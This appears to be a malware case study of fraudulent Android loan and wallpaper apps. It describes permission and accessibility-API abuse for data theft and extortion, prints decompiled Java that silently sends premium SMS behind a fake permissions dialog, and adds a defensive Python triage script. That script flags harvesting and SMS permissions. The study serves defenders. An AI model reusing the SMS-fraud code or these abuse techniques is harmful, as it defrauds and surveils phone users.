Phony Phones — Case Study 1&2
Case Study 1: Instant Loan Apps:-
Posing as a loan facilitator, this app originates from a neighboring country that is itself bankrupt. The snippet extracted from the Android Manifest file of the malicious Moneyfine.apk Android app reveals the permissions it uses to carry out its malicious activities.
In another case, the biggest similar SDK, dubbed Loan Spy, abuses the accessibility API to get access to WhatsApp messages, then guesses whether the user is legitimate based on their WhatsApp usage. This comes on top of the array of sensitive information on the user's device: call log information, SMS messages, contact lists, GPS location data, etc. What sets it apart is that Loan Spy also abuses the accessibility API to break the sandbox between Android apps. The accessibility API includes support for tools like screen readers, input simulation, and other features that ignore the sandbox between applications, which enables Loan Spy to interact fully with all apps on the system.
Code review reveals that the app primarily exploits permissions for contacts, call logs, and camera access for selfie upload. The obfuscation level was minimal, and the app remained undetected by many antivirus programs, primarily because the exploited permissions were limited. The app functioned like a typical instant loan app and victims were made to complete the KYC process; however, KYC details were also utilized in the process of money extortion.
Case Study 2: Wallpaper Apps:-
Since the early days of Android, wallpaper apps have pretended to offer home screen wallpapers for download. The SMS fraud functionality in com.kk4.SkypeWallpapers (v3, 8cab) checks whether it is running on a Russian phone and, if so, executes the makeRelation method to send an undisclosed premium SMS.
    private void makeRelation(
            String phoneNumber, String message, Context context) {
        int v3_0 = 0;  // decompiler temporary, reused as request code and flags
        // Dialog builder handed to the SMS_SENT receiver registered below
        AlertDialog.Builder v6_1 = new AlertDialog.Builder(this);
        v6_1.setMessage("You don't have enough permissions");
        v6_1.setCancelable(false);
        v6_1.setNeutralButton("OK",
                new com.kk4.SkypeWallpapers.AlertActivity$5(this));
        // Broadcasts fired when the SMS is sent and when it is delivered
        PendingIntent v4_0 = PendingIntent.getBroadcast(
                this, v3_0, new Intent("SMS_SENT"), v3_0);
        PendingIntent v5_0 = PendingIntent.getBroadcast(
                this, v3_0, new Intent("SMS_DELIVERED"), v3_0);
        this.registerReceiver(
                new com.kk4.SkypeWallpapers.AlertActivity$6(this, v6_1),
                new IntentFilter("SMS_SENT"));
        // The SMS itself; null selects the default service center address
        SmsManager.getDefault().sendTextMessage(
                phoneNumber, null, message, v4_0, v5_0);
    }
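A defender's triage check for the permission patterns described in both case studies, as an added example that is not code from the original page or from either app. It assumes the manifest has already been decoded to text XML; the rule groupings, thresholds, package names and sample manifests are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
P = "android.permission."

# Rule name -> (permissions, minimum matches). Groupings and thresholds are
# assumptions of this example, drawn from the behaviours the case studies name.
RULES = {
    "contact/call-log/camera harvesting": ({P + "READ_CONTACTS", P + "READ_CALL_LOG", P + "CAMERA"}, 2),
    "SMS and location collection": ({P + "READ_SMS", P + "ACCESS_FINE_LOCATION"}, 1),
    "can send SMS (premium-SMS risk)": ({P + "SEND_SMS"}, 1),
}

def triage_manifest(manifest_xml):
    """Return {finding: sorted evidence} for a decoded AndroidManifest.xml string."""
    root = ET.fromstring(manifest_xml)
    requested = {
        el.get(ANDROID + "name")
        for tag in ("uses-permission", "uses-permission-sdk-23")
        for el in root.iter(tag)
    }
    findings = {}
    for label, (perms, minimum) in RULES.items():
        hits = sorted(perms & requested)
        if len(hits) >= minimum:
            findings[label] = hits
    # An accessibility service is a <service> guarded by BIND_ACCESSIBILITY_SERVICE.
    services = sorted(
        svc.get(ANDROID + "name", "?")
        for svc in root.iter("service")
        if svc.get(ANDROID + "permission") == P + "BIND_ACCESSIBILITY_SERVICE"
    )
    if services:
        findings["declares accessibility service"] = services
    return findings

# Constructed samples (not the manifests of the apps discussed above).
HEAD = '<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="%s">'
PERM = '<uses-permission android:name="android.permission.%s"/>'
LOAN_SAMPLE = (HEAD % "com.example.loan"
    + "".join(PERM % p for p in ("READ_CONTACTS", "READ_CALL_LOG", "CAMERA", "INTERNET"))
    + '<application><service android:name=".AssistService" '
      'android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"/></application></manifest>')
WALLPAPER_SAMPLE = (HEAD % "com.example.wallpaper"
    + "".join(PERM % p for p in ("SET_WALLPAPER", "SEND_SMS")) + "</manifest>")

if __name__ == "__main__":
    for name, xml in (("loan", LOAN_SAMPLE), ("wallpaper", WALLPAPER_SAMPLE)):
        print(name, triage_manifest(xml))
```

A finding is a prompt for manual review, not a verdict: the signal is the mismatch between the app's stated purpose (loans, wallpapers) and what it requests.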